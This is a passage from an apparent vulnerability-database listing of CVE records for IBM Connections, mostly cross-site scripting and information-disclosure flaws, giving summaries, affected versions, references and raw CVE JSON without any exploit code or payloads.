                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "Cross-site scripting (XSS) vulnerability in IBM Connections 3.0.1.1 and earlier, 4.0, 4.5, and 5.0 before CR4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. IBM X-Force ID: 108355."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "http://www-01.ibm.com/support/docview.wss?uid=swg21980518",
                  "refsource": "CONFIRM",
                  "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980518"
                },
                {
                  "name": "ibm-connections-cve20157459-xss(108355)",
                  "refsource": "XF",
                  "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/108355"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
        "assignerShortName": "ibm",
        "cveId": "CVE-2015-7459",
        "datePublished": "2018-03-20T21:00:00.000Z",
        "dateReserved": "2015-09-29T00:00:00.000Z",
        "dateUpdated": "2024-08-06T07:51:27.580Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2015-7458 (GCVE-0-2015-7458)

    Vulnerability from nvd – Published: 2018-03-20 21:00 – Updated: 2024-08-06 07:51
    VLAI
    Summary
    Cross-site scripting (XSS) vulnerability in IBM Connections 3.0.1.1 and earlier, 4.0, 4.5, and 5.0 before CR4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. IBM X-Force ID: 108354.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    ibm
    References
    Date Public
    2016-04-14 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-06T07:51:27.607Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980518"
              },
              {
                "name": "ibm-connections-cve20157458-xss(108354)",
                "tags": [
                  "vdb-entry",
                  "x_refsource_XF",
                  "x_transferred"
                ],
                "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/108354"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "datePublic": "2016-04-14T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "Cross-site scripting (XSS) vulnerability in IBM Connections 3.0.1.1 and earlier, 4.0, 4.5, and 5.0 before CR4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. IBM X-Force ID: 108354."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2018-03-20T20:57:01.000Z",
            "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
            "shortName": "ibm"
          },
          "references": [
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980518"
            },
            {
              "name": "ibm-connections-cve20157458-xss(108354)",
              "tags": [
                "vdb-entry",
                "x_refsource_XF"
              ],
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/108354"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "psirt@us.ibm.com",
              "ID": "CVE-2015-7458",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "Cross-site scripting (XSS) vulnerability in IBM Connections 3.0.1.1 and earlier, 4.0, 4.5, and 5.0 before CR4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. IBM X-Force ID: 108354."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "http://www-01.ibm.com/support/docview.wss?uid=swg21980518",
                  "refsource": "CONFIRM",
                  "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980518"
                },
                {
                  "name": "ibm-connections-cve20157458-xss(108354)",
                  "refsource": "XF",
                  "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/108354"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
        "assignerShortName": "ibm",
        "cveId": "CVE-2015-7458",
        "datePublished": "2018-03-20T21:00:00.000Z",
        "dateReserved": "2015-09-29T00:00:00.000Z",
        "dateUpdated": "2024-08-06T07:51:27.607Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2017-1682 (GCVE-0-2017-1682)

    Vulnerability from nvd – Published: 2018-02-14 15:00 – Updated: 2024-09-16 19:41
    VLAI
    Summary
    IBM Connections 4.0, 4.5, 5.0, 5.5, and 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 134004.
    Severity
    No CVSS data available.
    CWE
    • Cross-Site Scripting
    Assigner
    ibm
    References
    Impacted products
    Vendor Product Version
    IBM Connections Affected: 4.5
    Affected: 4.0
    Affected: 5.0
    Affected: 5.5
    Affected: 6.0
    Create a notification for this product.
    Date Public
    2018-02-12 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-05T13:39:32.124Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "http://www.ibm.com/support/docview.wss?uid=swg22012900"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/134004"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "Connections",
              "vendor": "IBM",
              "versions": [
                {
                  "status": "affected",
                  "version": "4.5"
                },
                {
                  "status": "affected",
                  "version": "4.0"
                },
                {
                  "status": "affected",
                  "version": "5.0"
                },
                {
                  "status": "affected",
                  "version": "5.5"
                },
                {
                  "status": "affected",
                  "version": "6.0"
                }
              ]
            }
          ],
          "datePublic": "2018-02-12T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "IBM Connections 4.0, 4.5, 5.0, 5.5, and 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 134004."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "Cross-Site Scripting",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2018-02-14T14:57:01.000Z",
            "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
            "shortName": "ibm"
          },
          "references": [
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "http://www.ibm.com/support/docview.wss?uid=swg22012900"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/134004"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "psirt@us.ibm.com",
              "DATE_PUBLIC": "2018-02-12T00:00:00",
              "ID": "CVE-2017-1682",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "Connections",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "4.5"
                              },
                              {
                                "version_value": "4.0"
                              },
                              {
                                "version_value": "5.0"
                              },
                              {
                                "version_value": "5.5"
                              },
                              {
                                "version_value": "6.0"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "IBM"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "IBM Connections 4.0, 4.5, 5.0, 5.5, and 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 134004."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "Cross-Site Scripting"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "http://www.ibm.com/support/docview.wss?uid=swg22012900",
                  "refsource": "CONFIRM",
                  "url": "http://www.ibm.com/support/docview.wss?uid=swg22012900"
                },
                {
                  "name": "https://exchange.xforce.ibmcloud.com/vulnerabilities/134004",
                  "refsource": "MISC",
                  "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/134004"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
        "assignerShortName": "ibm",
        "cveId": "CVE-2017-1682",
        "datePublished": "2018-02-14T15:00:00.000Z",
        "dateReserved": "2016-11-30T00:00:00.000Z",
        "dateUpdated": "2024-09-16T19:41:22.595Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2017-1683 (GCVE-0-2017-1683)

    Vulnerability from nvd – Published: 2017-12-11 21:00 – Updated: 2024-09-17 04:28
    VLAI
    Summary
    IBM Connections Engagement Center 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 134005.
    Severity
    No CVSS data available.
    CWE
    • Cross-Site Scripting
    Assigner
    ibm
    References
    Impacted products
    Vendor Product Version
    IBM Connections Affected: 6.0
    Create a notification for this product.
    Date Public
    2017-12-04 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-05T13:39:31.991Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/134005"
              },
              {
                "name": "102051",
                "tags": [
                  "vdb-entry",
                  "x_refsource_BID",
                  "x_transferred"
                ],
                "url": "http://www.securityfocus.com/bid/102051"
              },
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "http://www.ibm.com/support/docview.wss?uid=swg22010690"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "Connections",
              "vendor": "IBM",
              "versions": [
                {
                  "status": "affected",
                  "version": "6.0"
                }
              ]
            }
          ],
          "datePublic": "2017-12-04T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "IBM Connections Engagement Center 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 134005."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "Cross-Site Scripting",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2017-12-12T10:57:01.000Z",
            "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
            "shortName": "ibm"
          },
          "references": [
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/134005"
            },
            {
              "name": "102051",
              "tags": [
                "vdb-entry",
                "x_refsource_BID"
              ],
              "url": "http://www.securityfocus.com/bid/102051"
            },
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "http://www.ibm.com/support/docview.wss?uid=swg22010690"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "psirt@us.ibm.com",
              "DATE_PUBLIC": "2017-12-04T00:00:00",
              "ID": "CVE-2017-1683",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "Connections",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "6.0"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "IBM"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "IBM Connections Engagement Center 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 134005."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "Cross-Site Scripting"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "https://exchange.xforce.ibmcloud.com/vulnerabilities/134005",
                  "refsource": "MISC",
                  "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/134005"
                },
                {
                  "name": "102051",
                  "refsource": "BID",
                  "url": "http://www.securityfocus.com/bid/102051"
                },
                {
                  "name": "http://www.ibm.com/support/docview.wss?uid=swg22010690",
                  "refsource": "CONFIRM",
                  "url": "http://www.ibm.com/support/docview.wss?uid=swg22010690"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
        "assignerShortName": "ibm",
        "cveId": "CVE-2017-1683",
        "datePublished": "2017-12-11T21:00:00.000Z",
        "dateReserved": "2016-11-30T00:00:00.000Z",
        "dateUpdated": "2024-09-17T04:28:48.799Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2017-1613 (GCVE-0-2017-1613)

    Vulnerability from nvd – Published: 2017-12-11 21:00 – Updated: 2024-09-16 23:01
    VLAI
    Summary
    IBM Connections 6.0 could allow an unauthenticated remote attacker to gain unauthenticated or unauthorized access to non-sensitive Engagement Center template data. IBM X-Force ID: 132954.
    Severity
    No CVSS data available.
    CWE
    • Obtain Information
    Assigner
    ibm
    References
    Impacted products
    Vendor Product Version
    IBM Connections Affected: 6.0
    Create a notification for this product.
    Date Public
    2017-12-04 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-05T13:39:31.528Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "name": "102051",
                "tags": [
                  "vdb-entry",
                  "x_refsource_BID",
                  "x_transferred"
                ],
                "url": "http://www.securityfocus.com/bid/102051"
              },
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "http://www.ibm.com/support/docview.wss?uid=swg22010690"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/132954"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "Connections",
              "vendor": "IBM",
              "versions": [
                {
                  "status": "affected",
                  "version": "6.0"
                }
              ]
            }
          ],
          "datePublic": "2017-12-04T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "IBM Connections 6.0 could allow an unauthenticated remote attacker to gain unauthenticated or unauthorized access to non-sensitive Engagement Center template data. IBM X-Force ID: 132954."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "Obtain Information",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2017-12-12T10:57:01.000Z",
            "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
            "shortName": "ibm"
          },
          "references": [
            {
              "name": "102051",
              "tags": [
                "vdb-entry",
                "x_refsource_BID"
              ],
              "url": "http://www.securityfocus.com/bid/102051"
            },
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "http://www.ibm.com/support/docview.wss?uid=swg22010690"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/132954"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "psirt@us.ibm.com",
              "DATE_PUBLIC": "2017-12-04T00:00:00",
              "ID": "CVE-2017-1613",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "Connections",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "6.0"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "IBM"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "IBM Connections 6.0 could allow an unauthenticated remote attacker to gain unauthenticated or unauthorized access to non-sensitive Engagement Center template data. IBM X-Force ID: 132954."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "Obtain Information"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "102051",
                  "refsource": "BID",
                  "url": "http://www.securityfocus.com/bid/102051"
                },
                {
                  "name": "http://www.ibm.com/support/docview.wss?uid=swg22010690",
                  "refsource": "CONFIRM",
                  "url": "http://www.ibm.com/support/docview.wss?uid=swg22010690"
                },
                {
                  "name": "https://exchange.xforce.ibmcloud.com/vulnerabilities/132954",
                  "refsource": "MISC",
                  "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/132954"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
        "assignerShortName": "ibm",
        "cveId": "CVE-2017-1613",
        "datePublished": "2017-12-11T21:00:00.000Z",
        "dateReserved": "2016-11-30T00:00:00.000Z",
        "dateUpdated": "2024-09-16T23:01:54.455Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2017-1498 (GCVE-0-2017-1498)

    Vulnerability from nvd – Published: 2017-12-07 15:00 – Updated: 2024-09-16 17:37
    VLAI
    Summary
    IBM Connections 5.5 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 129020.
    Severity
    No CVSS data available.
    CWE
    • Cross-Site Scripting
    Assigner
    ibm
    References
    Impacted products
    Vendor Product Version
    IBM Connections Affected: 5.5
    Create a notification for this product.
    Date Public
    2017-12-04 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-05T13:32:30.261Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "name": "102048",
                "tags": [
                  "vdb-entry",
                  "x_refsource_BID",
                  "x_transferred"
                ],
                "url": "http://www.securityfocus.com/bid/102048"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/129020"
              },
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "http://www.ibm.com/support/docview.wss?uid=swg22006286"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "Connections",
              "vendor": "IBM",
              "versions": [
                {
                  "status": "affected",
                  "version": "5.5"
                }
              ]
            }
          ],
          "datePublic": "2017-12-04T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "IBM Connections 5.5 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 129020."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "Cross-Site Scripting",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2017-12-08T10:57:01.000Z",
            "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
            "shortName": "ibm"
          },
          "references": [
            {
              "name": "102048",
              "tags": [
                "vdb-entry",
                "x_refsource_BID"
              ],
              "url": "http://www.securityfocus.com/bid/102048"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/129020"
            },
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "http://www.ibm.com/support/docview.wss?uid=swg22006286"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "psirt@us.ibm.com",
              "DATE_PUBLIC": "2017-12-04T00:00:00",
              "ID": "CVE-2017-1498",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "Connections",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "5.5"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "IBM"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "IBM Connections 5.5 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 129020."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "Cross-Site Scripting"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "102048",
                  "refsource": "BID",
                  "url": "http://www.securityfocus.com/bid/102048"
                },
                {
                  "name": "https://exchange.xforce.ibmcloud.com/vulnerabilities/129020",
                  "refsource": "MISC",
                  "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/129020"
                },
                {
                  "name": "http://www.ibm.com/support/docview.wss?uid=swg22006286",
                  "refsource": "CONFIRM",
                  "url": "http://www.ibm.com/support/docview.wss?uid=swg22006286"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
        "assignerShortName": "ibm",
        "cveId": "CVE-2017-1498",
        "datePublished": "2017-12-07T15:00:00.000Z",
        "dateReserved": "2016-11-30T00:00:00.000Z",
        "dateUpdated": "2024-09-16T17:37:54.912Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2019-4403 (GCVE-0-2019-4403)

    Vulnerability from cvelistv5 – Published: 2019-06-14 14:45 – Updated: 2024-09-17 00:46
    VLAI
    Summary
    IBM Connections 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 162264.
    CWE
    • Cross-Site Scripting
    Assigner
    ibm
    References
    Impacted products
    Vendor Product Version
    IBM Connections Affected: 6.0
    Create a notification for this product.
    Date Public
    2019-06-12 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-04T19:33:38.289Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "https://www.ibm.com/support/docview.wss?uid=ibm10886079"
              },
              {
                "name": "ibm-connections-cve20194403-xss (162264)",
                "tags": [
                  "vdb-entry",
                  "x_refsource_XF",
                  "x_transferred"
                ],
                "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/162264"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "Connections",
              "vendor": "IBM",
              "versions": [
                {
                  "status": "affected",
                  "version": "6.0"
                }
              ]
            }
          ],
          "datePublic": "2019-06-12T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "IBM Connections 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 162264."
            }
          ],
          "metrics": [
            {
              "cvssV3_0": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 5.4,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitCodeMaturity": "HIGH",
                "integrityImpact": "LOW",
                "privilegesRequired": "LOW",
                "remediationLevel": "OFFICIAL_FIX",
                "reportConfidence": "CONFIRMED",
                "scope": "CHANGED",
                "temporalScore": 5.2,
                "temporalSeverity": "MEDIUM",
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.0/PR:L/S:C/A:N/I:L/AV:N/C:L/AC:L/UI:R/RL:O/E:H/RC:C",
                "version": "3.0"
              }
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "Cross-Site Scripting",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2019-06-14T14:45:18.000Z",
            "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
            "shortName": "ibm"
          },
          "references": [
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "https://www.ibm.com/support/docview.wss?uid=ibm10886079"
            },
            {
              "name": "ibm-connections-cve20194403-xss (162264)",
              "tags": [
                "vdb-entry",
                "x_refsource_XF"
              ],
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/162264"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "psirt@us.ibm.com",
              "DATE_PUBLIC": "2019-06-12T00:00:00",
              "ID": "CVE-2019-4403",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "Connections",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "6.0"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "IBM"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "IBM Connections 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 162264."
                }
              ]
            },
            "impact": {
              "cvssv3": {
                "BM": {
                  "A": "N",
                  "AC": "L",
                  "AV": "N",
                  "C": "L",
                  "I": "L",
                  "PR": "L",
                  "S": "C",
                  "UI": "R"
                },
                "TM": {
                  "E": "H",
                  "RC": "C",
                  "RL": "O"
                }
              }
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "Cross-Site Scripting"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "https://www.ibm.com/support/docview.wss?uid=ibm10886079",
                  "refsource": "CONFIRM",
                  "title": "IBM Security Bulletin 886079 (Connections)",
                  "url": "https://www.ibm.com/support/docview.wss?uid=ibm10886079"
                },
                {
                  "name": "ibm-connections-cve20194403-xss (162264)",
                  "refsource": "XF",
                  "title": "X-Force Vulnerability Report",
                  "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/162264"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
        "assignerShortName": "ibm",
        "cveId": "CVE-2019-4403",
        "datePublished": "2019-06-14T14:45:18.106Z",
        "dateReserved": "2019-01-03T00:00:00.000Z",
        "dateUpdated": "2024-09-17T00:46:24.965Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2018-1896 (GCVE-0-2018-1896)

    Vulnerability from cvelistv5 – Published: 2018-12-07 16:00 – Updated: 2024-09-16 22:25
    VLAI
    Summary
    IBM Connections 5.0, 5.5, and 6.0 is vulnerable to possible host header injection attack that could cause navigation to the attacker's domain. IBM X-Force ID: 152456.
    CWE
    • Gain Access
    Assigner
    ibm
    References
    Impacted products
    Vendor Product Version
    IBM Connections Affected: 5.0
    Affected: 5.5
    Affected: 6.0
    Create a notification for this product.
    Date Public
    2018-12-05 00:00
    Show details on NVD website

    {
